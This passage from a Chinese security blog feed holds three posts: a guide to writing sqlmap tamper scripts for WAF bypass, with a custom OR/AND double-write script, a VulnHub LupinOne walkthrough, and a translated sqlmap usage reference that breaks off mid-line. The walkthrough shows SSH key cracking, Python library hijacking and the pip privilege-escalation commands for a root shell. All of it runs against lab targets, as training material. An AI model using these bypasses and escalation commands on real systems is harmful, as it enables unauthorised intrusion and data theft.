    <content><![CDATA[<h1 id="Sqlmap-tamper"><a href="#Sqlmap-tamper" class="headerlink" title="Sqlmap-tamper"></a>Sqlmap-tamper</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>sqlmap的<code>--tamper</code>参数可以用给定脚本修改注入数据，主要功能是用来绕过各种waf</p>
<span id="more"></span>

<h2 id="Tamper结构"><a href="#Tamper结构" class="headerlink" title="Tamper结构"></a>Tamper结构</h2><p>从sqlmap自带的tamper中随便找了一个</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)</span></span><br><span class="line"><span class="string">See the file &#x27;LICENSE&#x27; for copying permission</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> lib.core.data <span class="keyword">import</span> kb</span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line"></span><br><span class="line">__priority__ = PRIORITY.NORMAL</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span>():</span></span><br><span class="line">    <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span>(<span class="params">payload, **kwargs</span>):</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Replaces each keyword character with lower case value (e.g. SELECT -&gt; select)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Tested against:</span></span><br><span class="line"><span class="string">        * Microsoft SQL Server 2005</span></span><br><span class="line"><span class="string">        * MySQL 4, 5.0 and 5.5</span></span><br><span class="line"><span class="string">        * Oracle 10g</span></span><br><span class="line"><span class="string">        * PostgreSQL 8.3, 8.4, 9.0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Notes:</span></span><br><span class="line"><span class="string">        * Useful to bypass very weak and bespoke web application firewalls</span></span><br><span class="line"><span class="string">          that has poorly written permissive regular expressions</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    &gt;&gt;&gt; tamper(&#x27;INSERT&#x27;)</span></span><br><span class="line"><span class="string">    &#x27;insert&#x27;</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    retVal = payload</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> payload:</span><br><span class="line">        <span class="keyword">for</span> match <span class="keyword">in</span> re.finditer(<span class="string">r&quot;\b[A-Za-z_]+\b&quot;</span>, retVal):</span><br><span class="line">            word = match.group()</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> word.upper() <span class="keyword">in</span> kb.keywords:</span><br><span class="line">                retVal = retVal.replace(word, word.lower())</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> retVal</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="引入库"><a href="#引入库" class="headerlink" title="引入库"></a>引入库</h3><p>最开始导入必须的库</p>
<h3 id="PRIORITY"><a href="#PRIORITY" class="headerlink" title="PRIORITY"></a>PRIORITY</h3><p>用来定义脚本的优先级，参数如下</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">LOWEST = -<span class="number">100</span></span><br><span class="line">LOWER = -<span class="number">50</span></span><br><span class="line">LOW = -<span class="number">10</span></span><br><span class="line">NORMAL = <span class="number">0</span></span><br><span class="line">HIGH = <span class="number">10</span></span><br><span class="line">HIGHER = <span class="number">50</span></span><br><span class="line">HIGHEST = <span class="number">100</span></span><br></pre></td></tr></table></figure>

<p>当同时使用多个tamper时，按优先级从高到低使用，编写的时候还得看运用场景，就跑一个tamper感觉这个参数也没啥必要</p>
<h3 id="dependencies"><a href="#dependencies" class="headerlink" title="dependencies"></a>dependencies</h3><p>一般用来输出提示信息，比如tamper支持的使用环境或场景，也可以不写东西直接pass</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">singleTimeWarnMessage() #在控制台中输出警告信息</span><br></pre></td></tr></table></figure>

<h3 id="tamper"><a href="#tamper" class="headerlink" title="tamper"></a>tamper</h3><p>tamper脚本主要函数，用于实现tamper的功能</p>
<p><code>payload</code>参数为sqlmap生成的原始payload</p>
<p><code>**kwargs</code>参数用的比较少，下面两个tamper中<code>kwargs</code>参数都通过更改请求头来绕waf</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#varnish.py</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span>(<span class="params">payload, **kwargs</span>):</span></span><br><span class="line">    headers = kwargs.get(<span class="string">&quot;headers&quot;</span>, &#123;&#125;)</span><br><span class="line">    headers[<span class="string">&quot;X-originating-IP&quot;</span>] = <span class="string">&quot;127.0.0.1&quot;</span></span><br><span class="line">    <span class="keyword">return</span> payload</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#xforwardedfor.py</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span>(<span class="params">payload, **kwargs</span>):</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Append a fake HTTP header &#x27;X-Forwarded-For&#x27; (and alike)</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    headers = kwargs.get(<span class="string">&quot;headers&quot;</span>, &#123;&#125;)</span><br><span class="line">    headers[<span class="string">&quot;X-Forwarded-For&quot;</span>] = randomIP()</span><br><span class="line">    headers[<span class="string">&quot;X-Client-Ip&quot;</span>] = randomIP()</span><br><span class="line">    headers[<span class="string">&quot;X-Real-Ip&quot;</span>] = randomIP()</span><br><span class="line">    headers[<span class="string">&quot;CF-Connecting-IP&quot;</span>] = randomIP()</span><br><span class="line">    headers[<span class="string">&quot;True-Client-IP&quot;</span>] = randomIP()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection</span></span><br><span class="line">    headers[<span class="string">&quot;Via&quot;</span>] = <span class="string">&quot;1.1 Chrome-Compression-Proxy&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007</span></span><br><span class="line">    headers[<span class="string">&quot;CF-IPCountry&quot;</span>] = random.sample((<span class="string">&#x27;GB&#x27;</span>, <span class="string">&#x27;US&#x27;</span>, <span class="string">&#x27;FR&#x27;</span>, <span class="string">&#x27;AU&#x27;</span>, <span class="string">&#x27;CA&#x27;</span>, <span class="string">&#x27;NZ&#x27;</span>, <span class="string">&#x27;BE&#x27;</span>, <span class="string">&#x27;DK&#x27;</span>, <span class="string">&#x27;FI&#x27;</span>, <span class="string">&#x27;IE&#x27;</span>, <span class="string">&#x27;AT&#x27;</span>, <span class="string">&#x27;IT&#x27;</span>, <span class="string">&#x27;LU&#x27;</span>, <span class="string">&#x27;NL&#x27;</span>, <span class="string">&#x27;NO&#x27;</span>, <span class="string">&#x27;PT&#x27;</span>, <span class="string">&#x27;SE&#x27;</span>, <span class="string">&#x27;ES&#x27;</span>, <span class="string">&#x27;CH&#x27;</span>), <span class="number">1</span>)[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> payload</span><br></pre></td></tr></table></figure>

<h2 id="Tamper编写"><a href="#Tamper编写" class="headerlink" title="Tamper编写"></a>Tamper编写</h2><h3 id="环境"><a href="#环境" class="headerlink" title="环境"></a><strong>环境</strong></h3><p>phpstudy + sqli-labs</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220223191305566.png" alt="image-20220223191305566"></p>
<p>过滤了<code>or</code>和<code>and</code></p>
<p>查看源文件，这两个关键词被替换为空了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220223191416824.png" alt="image-20220223191416824"></p>
<p>并且在执行sql查询之前，用户输入的内容只用<code>blacklist</code>函数过滤了一遍，那么这里就可以直接用双写来绕过</p>
<h3 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line"><span class="keyword">from</span> lib.core.common <span class="keyword">import</span> singleTimeWarnMessage</span><br><span class="line"></span><br><span class="line">__priority__ = PRIORITY.HIGHEST</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span>():</span></span><br><span class="line">    singleTimeWarnMessage(<span class="string">&quot;bypass:or,and&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span>(<span class="params">payload, **kwargs</span>):</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    双写绕过关键词on和and过滤</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    retVal = payload</span><br><span class="line">    retVal = re.sub(<span class="string">r&quot;(OR)&quot;</span>,<span class="string">&quot;OORR&quot;</span>,retVal)</span><br><span class="line">    retVal = re.sub(<span class="string">r&quot;(AND)&quot;</span>, <span class="string">&quot;AANDND&quot;</span>, retVal)</span><br><span class="line">    <span class="comment"># retVal = re.sub(r&quot;(AND)&quot;, &quot;%26%26&quot;, retVal) AND可用&amp;&amp;替换</span></span><br><span class="line">    <span class="keyword">return</span> retVal</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="运行结果"><a href="#运行结果" class="headerlink" title="运行结果"></a>运行结果</h3><p>执行测试</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-25/?id=1 --tamper=test --proxy=http://127.0.0.1:80 -v 3 --dbs</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220223195544409.png" alt="image-20220223195544409"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220223195602740.png" alt="image-20220223195602740"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220223195732933.png" alt="image-20220223195732933"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220223195826674.png" alt="image-20220223195826674"></p>
<p>可以看到原始payload中的关键词被替换掉了，最终也成功获取了数据库</p>
<p>END</p>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>sqlmap作为一款强大的sql注入工具效率远远高于纯手工注入，再根据实际渗透的场景来编写tamper，两者结合使用可以节约很多时间</p>
]]></content>
      <tags>
        <tag>Python</tag>
        <tag>sqlmap</tag>
      </tags>
  </entry>
  <entry>
    <title>VulnHub-Empire:LupinOne</title>
    <url>/2022/01/17/VulnHub-Empire-LupinOne/</url>
    <content><![CDATA[<h1 id="VulnHub-Empire-LupinOne"><a href="#VulnHub-Empire-LupinOne" class="headerlink" title="VulnHub-Empire: LupinOne"></a>VulnHub-Empire: LupinOne</h1><p><strong>Level: Easy-Medium</strong></p>
<span id="more"></span>

<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111192526980.png" alt="image-20220111192526980"></p>
<p>开放22、80端口，同时<code>robots.txt</code>中提示有个名为<code>/~myfiles</code>的目录</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111194123394.png" alt="image-20220111194123394"></p>
<p>假的404页面</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111193628871.png" alt="image-20220111193628871"></p>
<p>查看源码发现提示信息”Your can do it, keep trying.”</p>
<h3 id="ffuf"><a href="#ffuf" class="headerlink" title="ffuf"></a>ffuf</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111195222767.png" alt="image-20220111195222767"></p>
<p>通过fuzz发现了另外一个目录<code>~secret</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111195711410.png" alt="image-20220111195711410"></p>
<p>筛选一下有用的信息</p>
<blockquote>
<p>疑似用户名：icex64 </p>
<p>这个目录下藏有ssh的私钥</p>
<p>用 fasttrack 破解密码</p>
</blockquote>
<p>继续fuzz</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">ffuf -u &quot;http://192.168.221.131/~secret/.FUZZ&quot; -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -fc 403 -e .txt,.html</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111201339971.png" alt="image-20220111201339971"></p>
<p>发现了<code>.mysecret.txt</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111201618284.png" alt="image-20220111201618284"></p>
<p>直接看不像是private key应该是编码过了，试了几种Base发现是base58 <a href="http://www.hiencode.com/base58w.html">解码点这</a></p>
<p>解码后得到sshkey</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111201903152.png" alt="image-20220111201903152"></p>
<h3 id="John"><a href="#John" class="headerlink" title="John"></a>John</h3><p>利用ssh2john获取sshkey的哈希值</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">/usr/share/john/ssh2john.py sshkey &gt; hash</span><br></pre></td></tr></table></figure>

<p>再用John破解得到密码为<strong>P@55w0rd!</strong> </p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">john --wordlist=/usr/share/wordlists/fasttrack.txt hash</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220111205221667.png" alt="image-20220111205221667"></p>
<p>通过已知用户<strong>icex64</strong>连接ssh，获得一个flag</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220112132931220.png" alt="image-20220112132931220"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p><code>sudo -l</code>发现用户有权以<strong>arsene</strong>身份运行<strong>heist.py</strong>且免密</p>
<p>查看<strong>webbrowser.py</strong>为任意用户可读写执行，利用python库劫持来利用该文件</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220112134653023.png" alt="image-20220112134653023"></p>
<h3 id="Python库劫持"><a href="#Python库劫持" class="headerlink" title="Python库劫持"></a>Python库劫持</h3><p>Python库劫持的方法后续会再写一篇文章来详细学习一下</p>
<p>这里因为<strong>heist.py</strong>调用了<strong>webbrowser.py</strong>且该文件任意用户可写，直接在该文件中调用<code>/bin/bash</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220112145242986.png" alt="image-20220112145242986"></p>
<p>现在可以直接通过<strong>heist.py</strong>来切换为<strong>arsene</strong>用户</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py</span><br></pre></td></tr></table></figure>

<h3 id="利用pip来Getshell"><a href="#利用pip来Getshell" class="headerlink" title="利用pip来Getshell"></a>利用pip来Getshell</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220112150413564.png" alt="image-20220112150413564"></p>
<p>简单看看<strong>arsene</strong>用户目录下，其中<strong>note.txt</strong>就是先前网页上看到的提示信息，其他没啥有用的</p>
<p><code>sudo -l</code>发现用户有权以 <strong>root</strong> 身份执行<strong>pip</strong>且免密</p>
<p>在<a href="https://gtfobins.github.io/">GTFOBins</a>上直接就有pip提权的方法</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">TF=$(mktemp -d)</span><br><span class="line">echo &quot;import os; os.execl(&#x27;/bin/sh&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;, &#x27;sh &lt;$(tty) &gt;$(tty) 2&gt;$(tty)&#x27;)&quot; &gt; $TF/setup.py</span><br><span class="line">pip install $TF</span><br></pre></td></tr></table></figure>

<p>这里直接利用以上三条命令就可获得root权限</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220112152050911.png" alt="image-20220112152050911"></p>
<p>root flag在**/root**目录下</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220112152225053.png" alt="image-20220112152225053"></p>
<p>end</p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>vulhub</tag>
      </tags>
  </entry>
  <entry>
    <title>sqlmap源码通读 1.0</title>
    <url>/2022/01/12/Sqlmap%E6%BA%90%E7%A0%81%E9%80%9A%E8%AF%BB%201.0/</url>
    <content><![CDATA[<h1 id="Sqlmap源码通读-1-0"><a href="#Sqlmap源码通读-1-0" class="headerlink" title="Sqlmap源码通读 1.0"></a>Sqlmap源码通读 1.0</h1><p>花了一个下午的时间看了一下<a href="https://sqlmap.campfire.ga/usage">SQLmap用户手册</a>，发现以前对SQLmap的认知真是太肤浅了。</p>
<p>1.0主要还是看Sqlmap的基础功能和实现细节</p>
<span id="more"></span>

<p>2.0打算看看tamper和其他模块实现（待码）</p>
<h2 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">用法：python sqlmap.py [选项]</span><br><span class="line">​</span><br><span class="line">选项：</span><br><span class="line">  -h, --help            显示基本帮助信息并退出</span><br><span class="line">  -hh                   显示高级帮助信息并退出</span><br><span class="line">  --version             显示程序版本信息并退出</span><br><span class="line">  -v VERBOSE            输出信息详细程度级别：0-6（默认为 1）</span><br><span class="line">​</span><br><span class="line">  目标：</span><br><span class="line">    至少提供一个以下选项以指定目标</span><br><span class="line">​</span><br><span class="line">    -d DIRECT           直接连接数据库</span><br><span class="line">    -u URL, --url=URL   目标 URL（例如：&quot;http://www.site.com/vuln.php?id=1&quot;）</span><br><span class="line">    -l LOGFILE          从 Burp 或 WebScarab 代理的日志文件中解析目标地址</span><br><span class="line">    -m BULKFILE         从文本文件中获取批量目标</span><br><span class="line">    -r REQUESTFILE      从文件中读取 HTTP 请求</span><br><span class="line">    -g GOOGLEDORK       使用 Google dork 结果作为目标</span><br><span class="line">    -c CONFIGFILE       从 INI 配置文件中加载选项</span><br><span class="line">​</span><br><span class="line">  请求：</span><br><span class="line">    以下选项可以指定连接目标地址的方式</span><br><span class="line">​</span><br><span class="line">    --method=METHOD     强制使用提供的 HTTP 方法（例如：PUT）</span><br><span class="line">    --data=DATA         使用 POST 发送数据串（例如：&quot;id=1&quot;）</span><br><span class="line">    --param-del=PARA..  设置参数值分隔符（例如：&amp;）</span><br><span class="line">    --cookie=COOKIE     指定 HTTP Cookie（例如：&quot;PHPSESSID=a8d127e..&quot;）</span><br><span class="line">    --cookie-del=COO..  设置 cookie 分隔符（例如：;）</span><br><span class="line">    --load-cookies=L..  指定以 Netscape/wget 格式存放 cookies 的文件</span><br><span class="line">    --drop-set-cookie   忽略 HTTP 响应中的 Set-Cookie 参数</span><br><span class="line">    --user-agent=AGENT  指定 HTTP User-Agent</span><br><span class="line">    --random-agent      使用随机的 HTTP User-Agent</span><br><span class="line">    --host=HOST         指定 HTTP Host</span><br><span class="line">    --referer=REFERER   指定 HTTP Referer</span><br><span class="line">    -H HEADER, --hea..  设置额外的 HTTP 头参数（例如：&quot;X-Forwarded-For: 127.0.0.1&quot;）</span><br><span class="line">    --headers=HEADERS   设置额外的 HTTP 头参数（例如：&quot;Accept-Language: fr\nETag: 123&quot;）</span><br><span class="line">    --auth-type=AUTH..  HTTP 认证方式（Basic，Digest，NTLM 或 PKI）</span><br><span class="line">    --auth-cred=AUTH..  HTTP 认证凭证（username:password）</span><br><span class="line">    --auth-file=AUTH..  HTTP 认证 PEM 证书/私钥文件</span><br><span class="line">    --ignore-code=IG..  忽略（有问题的）HTTP 错误码（例如：401）</span><br><span class="line">    --ignore-proxy      忽略系统默认代理设置</span><br><span class="line">    --ignore-redirects  忽略重定向尝试</span><br><span class="line">    --ignore-timeouts   忽略连接超时</span><br><span class="line">    --proxy=PROXY       使用代理连接目标 URL</span><br><span class="line">    --proxy-cred=PRO..  使用代理进行认证（username:password）</span><br><span class="line">    --proxy-file=PRO..  从文件中加载代理列表</span><br><span class="line">    --tor               使用 Tor 匿名网络</span><br><span class="line">    --tor-port=TORPORT  设置 Tor 代理端口代替默认端口</span><br><span class="line">    --tor-type=TORTYPE  设置 Tor 代理方式（HTTP，SOCKS4 或 SOCKS5（默认））</span><br><span class="line">    --check-tor         检查是否正确使用了 Tor</span><br><span class="line">    --delay=DELAY       设置每个 HTTP 请求的延迟秒数</span><br><span class="line">    --timeout=TIMEOUT   设置连接响应的有效秒数（默认为 30）</span><br><span class="line">    --retries=RETRIES   连接超时时重试次数（默认为 3）</span><br><span class="line">    --randomize=RPARAM  随机更改给定的参数值</span><br><span class="line">    --safe-url=SAFEURL  测试过程中可频繁访问且合法的 URL 地址（译者注：</span><br><span class="line">                        有些网站在你连续多次访问错误地址时会关闭会话连接，</span><br><span class="line">                        后面的“请求”小节有详细说明）</span><br><span class="line">    --safe-post=SAFE..  使用 POST 方法发送合法的数据</span><br><span class="line">    --safe-req=SAFER..  从文件中加载合法的 HTTP 请求</span><br><span class="line">    --safe-freq=SAFE..  每访问两次给定的合法 URL 才发送一次测试请求</span><br><span class="line">    --skip-urlencode    不对 payload 数据进行 URL 编码</span><br><span class="line">    --csrf-token=CSR..  设置网站用来反 CSRF 攻击的 token</span><br><span class="line">    --csrf-url=CSRFURL  指定可提取防 CSRF 攻击 token 的 URL</span><br><span class="line">    --force-ssl         强制使用 SSL/HTTPS</span><br><span class="line">    --hpp               使用 HTTP 参数污染攻击</span><br><span class="line">    --eval=EVALCODE     在发起请求前执行给定的 Python 代码（例如：</span><br><span class="line">                        &quot;import hashlib;id2=hashlib.md5(id).hexdigest()&quot;）</span><br><span class="line">​</span><br><span class="line">  优化：</span><br><span class="line">    以下选项用于优化 sqlmap 性能</span><br><span class="line">​</span><br><span class="line">    -o                  开启所有优化开关</span><br><span class="line">    --predict-output    预测常用请求的输出</span><br><span class="line">    --keep-alive        使用持久的 HTTP(S) 连接</span><br><span class="line">    --null-connection   仅获取页面大小而非实际的 HTTP 响应</span><br><span class="line">    --threads=THREADS   设置 HTTP(S) 请求并发数最大值（默认为 1）</span><br><span class="line">​</span><br><span class="line">  注入：</span><br><span class="line">    以下选项用于指定要测试的参数，</span><br><span class="line">    提供自定义注入 payloads 和篡改参数的脚本</span><br><span class="line">​</span><br><span class="line">    -p TESTPARAMETER    指定需要测试的参数</span><br><span class="line">    --skip=SKIP         指定要跳过的参数</span><br><span class="line">    --skip-static       指定跳过非动态参数</span><br><span class="line">    --param-exclude=..  用正则表达式排除参数（例如：&quot;ses&quot;）</span><br><span class="line">    --dbms=DBMS         指定后端 DBMS（Database Management System，</span><br><span class="line">                        数据库管理系统）类型（例如：MySQL）</span><br><span class="line">    --dbms-cred=DBMS..  DBMS 认证凭据（username:password）</span><br><span class="line">    --os=OS             指定后端 DBMS 的操作系统类型</span><br><span class="line">    --invalid-bignum    将无效值设置为大数</span><br><span class="line">    --invalid-logical   对无效值使用逻辑运算</span><br><span class="line">    --invalid-string    对无效值使用随机字符串</span><br><span class="line">    --no-cast           关闭 payload 构造机制</span><br><span class="line">    --no-escape         关闭字符串转义机制</span><br><span class="line">    --prefix=PREFIX     注入 payload 的前缀字符串</span><br><span class="line">    --suffix=SUFFIX     注入 payload 的后缀字符串</span><br><span class="line">    --tamper=TAMPER     用给定脚本修改注入数据</span><br><span class="line">​</span><br><span class="line">  检测：</span><br><span class="line">    以下选项用于自定义检测方式</span><br><span class="line">​</span><br><span class="line">    --level=LEVEL       设置测试等级（1-5，默认为 1）</span><br><span class="line">    --risk=RISK         设置测试风险等级（1-3，默认为 1）</span><br><span class="line">    --string=STRING     用于确定查询结果为真时的字符串</span><br><span class="line">    --not-string=NOT..  用于确定查询结果为假时的字符串</span><br><span class="line">    --regexp=REGEXP     用于确定查询结果为真时的正则表达式</span><br><span class="line">    --code=CODE         用于确定查询结果为真时的 HTTP 状态码</span><br><span class="line">    --text-only         只根据页面文本内容对比页面</span><br><span class="line">    --titles            只根据页面标题对比页面</span><br><span class="line">​</span><br><span class="line">  技术：</span><br><span class="line">    以下选项用于调整特定 SQL 注入技术的测试方法</span><br><span class="line">​</span><br><span class="line">    --technique=TECH    使用的 SQL 注入技术（默认为“BEUSTQ”，译者注：</span><br><span class="line">                        B: Boolean-based blind SQL injection（布尔型盲注）</span><br><span class="line">                        E: Error-based SQL injection（报错型注入）</span><br><span class="line">                        U: UNION query SQL injection（联合查询注入）</span><br><span class="line">                        S: Stacked queries SQL injection（堆叠查询注入）</span><br><span class="line">                        T: Time-based blind SQL injection（时间型盲注）</span><br><span class="line">                        Q: inline Query injection（内联查询注入）</span><br><span class="line">    --time-sec=TIMESEC  延迟 DBMS 的响应秒数（默认为 5）</span><br><span class="line">    --union-cols=UCOLS  设置联合查询注入测试的列数目范围</span><br><span class="line">    --union-char=UCHAR  用于暴力猜解列数的字符</span><br><span class="line">    --union-from=UFROM  设置联合查询注入 FROM 处用到的表</span><br><span class="line">    --dns-domain=DNS..  设置用于 DNS 渗出攻击的域名（译者注：</span><br><span class="line">                        推荐阅读《在SQL注入中使用DNS获取数据》</span><br><span class="line">                        http://cb.drops.wiki/drops/tips-5283.html，</span><br><span class="line">                        在后面的“技术”小节中也有相应解释）</span><br><span class="line">    --second-url=SEC..  设置二阶响应的结果显示页面的 URL（译者注：</span><br><span class="line">                        该选项用于 SQL 二阶注入）</span><br><span class="line">    --second-req=SEC..  从文件读取 HTTP 二阶请求</span><br><span class="line">​</span><br><span class="line">  指纹识别：</span><br><span class="line">    -f, --fingerprint   执行广泛的 DBMS 版本指纹识别</span><br><span class="line">​</span><br><span class="line">  枚举：</span><br><span class="line">    以下选项用于获取后端 DBMS 的信息，结构和数据表中的数据。</span><br><span class="line">    此外，还可以运行你输入的 SQL 语句</span><br><span class="line">​</span><br><span class="line">    -a, --all           获取所有信息、数据</span><br><span class="line">    -b, --banner        获取 DBMS banner</span><br><span class="line">    --current-user      获取 DBMS 当前用户</span><br><span class="line">    --current-db        获取 DBMS 当前数据库</span><br><span class="line">    --hostname          获取 DBMS 服务器的主机名</span><br><span class="line">    --is-dba            探测 DBMS 当前用户是否为 DBA（数据库管理员）</span><br><span class="line">    --users             枚举出 DBMS 所有用户</span><br><span class="line">    --passwords         枚举出 DBMS 所有用户的密码哈希</span><br><span class="line">    --privileges        枚举出 DBMS 所有用户特权级</span><br><span class="line">    --roles             枚举出 DBMS 所有用户角色</span><br><span class="line">    --dbs               枚举出 DBMS 所有数据库</span><br><span class="line">    --tables            枚举出 DBMS 数据库中的所有表</span><br><span class="line">    --columns           枚举出 DBMS 表中的所有列</span><br><span class="line">    --schema            枚举出 DBMS 所有模式</span><br><span class="line">    --count             获取数据表数目</span><br><span class="line">    --dump              导出 DBMS 数据库表项</span><br><span class="line">    --dump-all          导出所有 DBMS 数据库表项</span><br><span class="line">    --search            搜索列，表和/或数据库名</span><br><span class="line">    --comments          枚举数据时检查 DBMS 注释</span><br><span class="line">    -D DB               指定要枚举的 DBMS 数据库</span><br><span class="line">    -T TBL              指定要枚举的 DBMS 数据表</span><br><span class="line">    -C COL              指定要枚举的 DBMS 数据列</span><br><span class="line">    -X EXCLUDE          指定不枚举的 DBMS 标识符</span><br><span class="line">    -U USER             指定枚举的 DBMS 用户</span><br><span class="line">    --exclude-sysdbs    枚举所有数据表时，指定排除特定系统数据库</span><br><span class="line">    --pivot-column=P..  指定主列</span><br><span class="line">    --where=DUMPWHERE   在转储表时使用 WHERE 条件语句</span><br><span class="line">    --start=LIMITSTART  指定要导出的数据表条目开始行数</span><br><span class="line">    --stop=LIMITSTOP    指定要导出的数据表条目结束行数</span><br><span class="line">    --first=FIRSTCHAR   指定获取返回查询结果的开始字符位</span><br><span class="line">    --last=LASTCHAR     指定获取返回查询结果的结束字符位</span><br><span class="line">    --sql-query=QUERY   指定要执行的 SQL 语句</span><br><span class="line">    --sql-shell         调出交互式 SQL shell</span><br><span class="line">    --sql-file=SQLFILE  执行文件中的 SQL 语句</span><br><span class="line">​</span><br><span class="line">  暴力破解：</span><br><span class="line">    以下选项用于暴力破解测试</span><br><span class="line">​</span><br><span class="line">    --common-tables     检测常见的表名是否存在</span><br><span class="line">    --common-columns    检测常用的列名是否存在</span><br><span class="line">​</span><br><span class="line">  用户自定义函数注入：</span><br><span class="line">    以下选项用于创建用户自定义函数</span><br><span class="line">​</span><br><span class="line">    --udf-inject        注入用户自定义函数</span><br><span class="line">    --shared-lib=SHLIB  共享库的本地路径</span><br><span class="line">​</span><br><span class="line">  访问文件系统：</span><br><span class="line">    以下选项用于访问后端 DBMS 的底层文件系统</span><br><span class="line">​</span><br><span class="line">    --file-read=FILE..  读取后端 